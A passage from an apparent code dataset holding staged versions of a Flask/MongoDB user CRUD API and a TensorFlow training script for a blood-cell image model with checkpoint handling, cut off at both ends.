{'msg':\n 'This route is currently not supported. Please refer API documentation.'\n }}\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n",
"step-4": "<mask token>\nimport json\nfrom bson.json_util import dumps\nfrom flask import abort, request, Response, jsonify\nfrom api import app, collection\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n message = {'err': {'msg':\n 'This route is currently not supported. Please refer API documentation.'\n }}\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n",
"step-5": "\"\"\"This module will serve the api request.\"\"\"\n\nimport json\nfrom bson.json_util import dumps\nfrom flask import abort, request, Response, jsonify\nfrom api import app, collection\n\n\[email protected](\"/api/v1/users\", methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n # Create new user\n try:\n body = request.get_json()\n except:\n # Bad request as request body is not available\n return abort(400)\n\n record_id = collection.insert(body)\n return jsonify({\"message\":\"Successfully Created the resource.\"}), 201\n\n except:\n # Error while trying to create the resource\n return \"Error while trying to create the resource\", 500\n\n\[email protected](\"/api/v1/users\", methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n # Fetch all the record(s)\n records_fetched = collection.find()\n\n # Check if the records are found\n if records_fetched.count() > 0:\n # Prepare the response\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n # No records are found\n return jsonify({\"message\":\"No records are found\"}), 404\n except Exception as e:\n print(str(e))\n # Error while trying to fetch the resource\n return jsonify({\"message\":\"Error while trying to fetch the resource\"}), 500\n\n\[email protected](\"/api/v1/users/<user_id>\", methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n # Get the value which needs to be updated\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n # Bad request as the request body is not available\n # Add message for debugging purpose\n return \"\", 400\n\n # Updating the user\n records_updated = collection.update_one({\"id\": int(user_id)}, body)\n\n # Check if resource is updated\n if records_updated.modified_count > 0:\n # Prepare the response as resource is updated successfully\n return \"\", 200\n else:\n # Bad request as the resource is not available to update\n # Add message for debugging purpose\n return \"\", 404\n except:\n # Error while trying to update the resource\n # Add message for debugging purpose\n return \"\", 500\n\n\[email protected](\"/api/v1/users/<user_id>\", methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n # Delete the user\n delete_user = collection.delete_one({\"id\": int(user_id)})\n\n if delete_user.deleted_count > 0 :\n # Prepare the response\n return \"\", 204\n else:\n # Resource Not found\n return \"\", 404\n except:\n # Error while trying to delete the resource\n # Add message for debugging purpose\n return \"\", 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n # Message to the user\n message = {\n \"err\":\n {\n \"msg\": \"This route is currently not supported. Please refer API documentation.\"\n }\n }\n # Making the message looks good\n resp = jsonify(message)\n # Sending OK response\n resp.status_code = 404\n # Returning the object\n return resp\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import tensorflow as tf
import blood_model
import os
import numpy as np
FLAGS = tf.app.flags.FLAGS
RUN = 'new_test_hm'
tf.app.flags.DEFINE_string('checkpoint_dir', RUN+'/checkpoints',
"""Directory where to write event logs and checkpoint.""")
tf.app.flags.DEFINE_string('summaries_dir', RUN+'/summaries',
"""Summaries directory""")
tf.app.flags.DEFINE_string('max_steps', 20000,
"""Maximum steps to train the model""")
tf.app.flags.DEFINE_string('continue_run', True,
"""Continue from when training stopped?""")
def train():
"""Train blood_model for a number of steps. Periodically evaluate training and validation accuracies """
global_step = tf.Variable(0, name='global_step', trainable=False)
# Get images and labels for blood_model.
blood_datasets = blood_model.inputs(eval_data=False)
# randomize the inputs look
x, y_, data, keep_prob = blood_model.prepare_input()
# build the convolution network
conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)
# Calculate loss.
loss = blood_model.loss(conv_output, y_)
accuracy = blood_model.accuracy(conv_output, y_)
train_op = blood_model.train(loss, global_step)
sess = tf.InteractiveSession()
sess.run(tf.initialize_all_variables())
# Build the summary operation based on the TF collection of Summaries.
summary_op = tf.merge_all_summaries()
saver = tf.train.Saver()
check_filesystem()
train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train', sess.graph)
validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/validation', sess.graph)
test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test', sess.graph)
_ = reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer)
for step in range(tf.train.global_step(sess, global_step)+1, FLAGS.max_steps):
batch = blood_datasets.train.next_batch()
_, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
assert not np.isnan(loss_output)
if step % 100 == 0:
summary, train_accuracy = sess.run([summary_op, accuracy], feed_dict={
x: batch[0], y_: batch[1], keep_prob: 1.0})
train_writer.add_summary(summary, step)
print("step %d, training accuracy %g, loss %g" % (step, train_accuracy, loss_output))
if (step % 1000 == 0 or (step + 1) == FLAGS.max_steps) and not step == 0:
batch = blood_datasets.validation.next_batch()
summary_validation, accuracy_validation = sess.run([summary_op, accuracy], feed_dict={
x: batch[0], y_: batch[1], keep_prob: 1.0})
validation_writer.add_summary(summary_validation, step)
print("validation accuracy %g" % accuracy_validation)
# save checkpoint
checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
print("saving checkpoint")
def check_filesystem():
"""
either start a new checkpoint or continue from existing checkpoint folder
"""
if FLAGS.continue_run:
# start a new run, set flag to continue, so there is nothing
# check if something there, if not, create, but don't delete
if not tf.gfile.Exists(FLAGS.summaries_dir):
tf.gfile.MakeDirs(FLAGS.summaries_dir)
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))
if not tf.gfile.Exists(FLAGS.checkpoint_dir):
tf.gfile.MakeDirs(FLAGS.checkpoint_dir)
else:
# delete checkpoints and event summaries because training restarted
if tf.gfile.Exists(FLAGS.summaries_dir):
tf.gfile.DeleteRecursively(FLAGS.summaries_dir)
tf.gfile.MakeDirs(FLAGS.summaries_dir)
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))
if tf.gfile.Exists(FLAGS.checkpoint_dir):
tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)
tf.gfile.MakeDirs(FLAGS.checkpoint_dir)
def reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer):
"""
restore existing model from checkpoint data
"""
global_step = -1
if FLAGS.continue_run:
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
# extract global_step from it.
global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1])
print("checkpoint found at step %d", global_step)
# ensure that the writers ignore saved summaries that occurred after the last checkpoint but before a crash
train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)
validation_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)
test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)
else:
print('No checkpoint file found')
return global_step
def main(argv=None):
train()
if __name__ == '__main__':
tf.app.run()
|
normal
|
{
"blob_id": "f653e906d3026de4bb1e705162f4321bb75e8705",
"index": 4166,
"step-1": "<mask token>\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].\n split('-')[-1])\n print('checkpoint found at step %d', global_step)\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog\n .START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.\n SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.\n START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\n\n<mask token>\n",
"step-2": "<mask token>\ntf.app.flags.DEFINE_string('checkpoint_dir', RUN + '/checkpoints',\n 'Directory where to write event logs and checkpoint.')\ntf.app.flags.DEFINE_string('summaries_dir', RUN + '/summaries',\n 'Summaries directory')\ntf.app.flags.DEFINE_string('max_steps', 20000,\n 'Maximum steps to train the model')\ntf.app.flags.DEFINE_string('continue_run', True,\n 'Continue from when training stopped?')\n\n\ndef train():\n \"\"\"Train blood_model for a number of steps. Periodically evaluate training and validation accuracies \"\"\"\n global_step = tf.Variable(0, name='global_step', trainable=False)\n blood_datasets = blood_model.inputs(eval_data=False)\n x, y_, data, keep_prob = blood_model.prepare_input()\n conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)\n loss = blood_model.loss(conv_output, y_)\n accuracy = blood_model.accuracy(conv_output, y_)\n train_op = blood_model.train(loss, global_step)\n sess = tf.InteractiveSession()\n sess.run(tf.initialize_all_variables())\n summary_op = tf.merge_all_summaries()\n saver = tf.train.Saver()\n check_filesystem()\n train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir +\n '/validation', sess.graph)\n test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test',\n sess.graph)\n _ = reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer)\n for step in range(tf.train.global_step(sess, global_step) + 1, FLAGS.\n max_steps):\n batch = blood_datasets.train.next_batch()\n _, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 0.5})\n assert not np.isnan(loss_output)\n if step % 100 == 0:\n summary, train_accuracy = sess.run([summary_op, accuracy],\n feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\n train_writer.add_summary(summary, step)\n print('step %d, training accuracy %g, loss %g' % (step,\n train_accuracy, loss_output))\n if (step % 1000 == 0 or step + 1 == FLAGS.max_steps) and not step == 0:\n batch = blood_datasets.validation.next_batch()\n summary_validation, accuracy_validation = sess.run([summary_op,\n accuracy], feed_dict={x: batch[0], y_: batch[1], keep_prob:\n 1.0})\n validation_writer.add_summary(summary_validation, step)\n print('validation accuracy %g' % accuracy_validation)\n checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n print('saving checkpoint')\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].\n split('-')[-1])\n print('checkpoint found at step %d', global_step)\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog\n .START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.\n SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.\n START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n",
"step-3": "<mask token>\nFLAGS = tf.app.flags.FLAGS\nRUN = 'new_test_hm'\ntf.app.flags.DEFINE_string('checkpoint_dir', RUN + '/checkpoints',\n 'Directory where to write event logs and checkpoint.')\ntf.app.flags.DEFINE_string('summaries_dir', RUN + '/summaries',\n 'Summaries directory')\ntf.app.flags.DEFINE_string('max_steps', 20000,\n 'Maximum steps to train the model')\ntf.app.flags.DEFINE_string('continue_run', True,\n 'Continue from when training stopped?')\n\n\ndef train():\n \"\"\"Train blood_model for a number of steps. Periodically evaluate training and validation accuracies \"\"\"\n global_step = tf.Variable(0, name='global_step', trainable=False)\n blood_datasets = blood_model.inputs(eval_data=False)\n x, y_, data, keep_prob = blood_model.prepare_input()\n conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)\n loss = blood_model.loss(conv_output, y_)\n accuracy = blood_model.accuracy(conv_output, y_)\n train_op = blood_model.train(loss, global_step)\n sess = tf.InteractiveSession()\n sess.run(tf.initialize_all_variables())\n summary_op = tf.merge_all_summaries()\n saver = tf.train.Saver()\n check_filesystem()\n train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir +\n '/validation', sess.graph)\n test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test',\n sess.graph)\n _ = reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer)\n for step in range(tf.train.global_step(sess, global_step) + 1, FLAGS.\n max_steps):\n batch = blood_datasets.train.next_batch()\n _, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 0.5})\n assert not np.isnan(loss_output)\n if step % 100 == 0:\n summary, train_accuracy = sess.run([summary_op, accuracy],\n feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\n train_writer.add_summary(summary, step)\n print('step %d, training accuracy %g, loss %g' % (step,\n train_accuracy, loss_output))\n if (step % 1000 == 0 or step + 1 == FLAGS.max_steps) and not step == 0:\n batch = blood_datasets.validation.next_batch()\n summary_validation, accuracy_validation = sess.run([summary_op,\n accuracy], feed_dict={x: batch[0], y_: batch[1], keep_prob:\n 1.0})\n validation_writer.add_summary(summary_validation, step)\n print('validation accuracy %g' % accuracy_validation)\n checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n print('saving checkpoint')\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].\n split('-')[-1])\n print('checkpoint found at step %d', global_step)\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog\n .START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.\n SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.\n START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n",
"step-4": "import tensorflow as tf\nimport blood_model\nimport os\nimport numpy as np\nFLAGS = tf.app.flags.FLAGS\nRUN = 'new_test_hm'\ntf.app.flags.DEFINE_string('checkpoint_dir', RUN + '/checkpoints',\n 'Directory where to write event logs and checkpoint.')\ntf.app.flags.DEFINE_string('summaries_dir', RUN + '/summaries',\n 'Summaries directory')\ntf.app.flags.DEFINE_string('max_steps', 20000,\n 'Maximum steps to train the model')\ntf.app.flags.DEFINE_string('continue_run', True,\n 'Continue from when training stopped?')\n\n\ndef train():\n \"\"\"Train blood_model for a number of steps. Periodically evaluate training and validation accuracies \"\"\"\n global_step = tf.Variable(0, name='global_step', trainable=False)\n blood_datasets = blood_model.inputs(eval_data=False)\n x, y_, data, keep_prob = blood_model.prepare_input()\n conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)\n loss = blood_model.loss(conv_output, y_)\n accuracy = blood_model.accuracy(conv_output, y_)\n train_op = blood_model.train(loss, global_step)\n sess = tf.InteractiveSession()\n sess.run(tf.initialize_all_variables())\n summary_op = tf.merge_all_summaries()\n saver = tf.train.Saver()\n check_filesystem()\n train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir +\n '/validation', sess.graph)\n test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test',\n sess.graph)\n _ = reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer)\n for step in range(tf.train.global_step(sess, global_step) + 1, FLAGS.\n max_steps):\n batch = blood_datasets.train.next_batch()\n _, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 0.5})\n assert not np.isnan(loss_output)\n if step % 100 == 0:\n summary, train_accuracy = sess.run([summary_op, accuracy],\n feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\n train_writer.add_summary(summary, step)\n print('step %d, training accuracy %g, loss %g' % (step,\n train_accuracy, loss_output))\n if (step % 1000 == 0 or step + 1 == FLAGS.max_steps) and not step == 0:\n batch = blood_datasets.validation.next_batch()\n summary_validation, accuracy_validation = sess.run([summary_op,\n accuracy], feed_dict={x: batch[0], y_: batch[1], keep_prob:\n 1.0})\n validation_writer.add_summary(summary_validation, step)\n print('validation accuracy %g' % accuracy_validation)\n checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n print('saving checkpoint')\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].\n split('-')[-1])\n print('checkpoint found at step %d', global_step)\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog\n .START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.\n SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.\n START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n",
"step-5": "import tensorflow as tf\nimport blood_model\nimport os\nimport numpy as np\n\n\nFLAGS = tf.app.flags.FLAGS\nRUN = 'new_test_hm'\ntf.app.flags.DEFINE_string('checkpoint_dir', RUN+'/checkpoints',\n \"\"\"Directory where to write event logs and checkpoint.\"\"\")\ntf.app.flags.DEFINE_string('summaries_dir', RUN+'/summaries',\n \"\"\"Summaries directory\"\"\")\ntf.app.flags.DEFINE_string('max_steps', 20000,\n \"\"\"Maximum steps to train the model\"\"\")\ntf.app.flags.DEFINE_string('continue_run', True,\n \"\"\"Continue from when training stopped?\"\"\")\n\n\ndef train():\n \"\"\"Train blood_model for a number of steps. Periodically evaluate training and validation accuracies \"\"\"\n\n global_step = tf.Variable(0, name='global_step', trainable=False)\n\n # Get images and labels for blood_model.\n blood_datasets = blood_model.inputs(eval_data=False)\n\n # randomize the inputs look\n x, y_, data, keep_prob = blood_model.prepare_input()\n\n # build the convolution network\n conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)\n # Calculate loss.\n loss = blood_model.loss(conv_output, y_)\n accuracy = blood_model.accuracy(conv_output, y_)\n\n train_op = blood_model.train(loss, global_step)\n\n sess = tf.InteractiveSession()\n\n sess.run(tf.initialize_all_variables())\n\n # Build the summary operation based on the TF collection of Summaries.\n summary_op = tf.merge_all_summaries()\n\n saver = tf.train.Saver()\n\n check_filesystem()\n\n train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train', sess.graph)\n validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/validation', sess.graph)\n test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test', sess.graph)\n\n _ = reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer)\n for step in range(tf.train.global_step(sess, global_step)+1, FLAGS.max_steps):\n batch = blood_datasets.train.next_batch()\n _, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n assert not np.isnan(loss_output)\n if step % 100 == 0:\n summary, train_accuracy = sess.run([summary_op, accuracy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: 1.0})\n train_writer.add_summary(summary, step)\n print(\"step %d, training accuracy %g, loss %g\" % (step, train_accuracy, loss_output))\n\n if (step % 1000 == 0 or (step + 1) == FLAGS.max_steps) and not step == 0:\n batch = blood_datasets.validation.next_batch()\n summary_validation, accuracy_validation = sess.run([summary_op, accuracy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: 1.0})\n validation_writer.add_summary(summary_validation, step)\n print(\"validation accuracy %g\" % accuracy_validation)\n\n # save checkpoint\n checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n print(\"saving checkpoint\")\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n # start a new run, set flag to continue, so there is nothing\n # check if something there, if not, create, but don't delete\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n # delete checkpoints and event summaries because training restarted\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n # Restores from checkpoint\n saver.restore(sess, ckpt.model_checkpoint_path)\n # extract global_step from it.\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1])\n print(\"checkpoint found at step %d\", global_step)\n # ensure that the writers ignore saved summaries that occurred after the last checkpoint but before a crash\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n else:\n print('No 